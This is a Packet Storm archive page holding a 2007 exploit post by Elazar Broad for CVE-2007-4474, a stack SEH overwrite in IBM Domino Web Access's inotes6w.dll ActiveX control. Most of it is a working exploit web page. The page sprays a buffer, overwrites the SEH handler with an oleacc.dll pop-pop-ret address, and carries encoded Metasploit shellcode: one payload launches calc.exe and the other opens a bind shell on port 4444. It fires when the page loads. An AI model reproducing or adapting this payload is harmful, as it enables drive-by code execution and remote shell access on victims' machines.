exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

inotes6w2-overwrite.txt

inotes6w2-overwrite.txt
Posted Dec 31, 2007
Authored by Elazar Broad

IBM Domino Web Access upload module inotes6.dll SEH overwrite exploit that has the same offset as the dwa7w exploit but the same class id as the original inotes6 exploit.

tags | exploit, web
advisories | CVE-2007-4474
SHA-256 | 58ead93457bb90bfbff8414e450da8513143cd665b5b3e055e2f3cc03d82e513

inotes6w2-overwrite.txt

Change Mirror Download
This one is the same offset as dwa7w and the same class id as 
inotes6. Basically inotes6 and inotes6w share the same class id,
except that inotes6w is unicode. dwa7w is unicode and has a
different class id. Code is inline, I would attach it except for
the fact that I set off way to many av scanners with my last
messages.

-----------------
<!--
written by e.b.
IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite
Exploit
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6w.dll
version 6.0.48.0
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>IBM Domino Web Access Upload Module inotes6w.dll SEH
Overwrite Exploit</title>
<script language="JavaScript" defer>
function Check() {

var buf = unescape("%u4141");
while (buf.length <= 2461) buf = buf + unescape("%u4141");


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +

"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +

"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +

"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +

"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +

"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +

"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +

"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +

"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +

"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +

"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +

"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +

"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +

"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +

"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +

"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +

"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +

"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
"%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +

"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +

"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +

"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +

"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +

"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +

"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +

"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +

"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +

"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +

"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +

"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +

"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +

"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +

"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +

"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +

"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +

"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +

"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +

"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +

"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +

"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +

"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +

"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +

"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +

"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +

"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +

"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +

"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +

"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +

"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +

"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +

"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +

"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +

"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +

"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +

"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +

"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +

"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +

"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +

"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +

"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +

"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
"%u684f%u3956%u386f%u4350");


var next_seh_pointer = unescape("%u06EB%u9090"); //2 byte jump

//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
//no SafeSEH
var seh_handler = unescape("%u6950%u74C9");

var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");

var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;

obj.General_ServerName = m;
obj.InstallBrowserHelperDll();

}

</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
Unable to create object
</object>
</body>
</html>

-----------------

Elazar

--
Dreaming of getting away? Click here for an island experience in Hawaii.
http://tagline.hushmail.com/fc/Ioyw6h4ePlomRvZZ2JKIMtgcHqjQSFiSke3Uq5lK03ZKdfW4js8ckw/

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close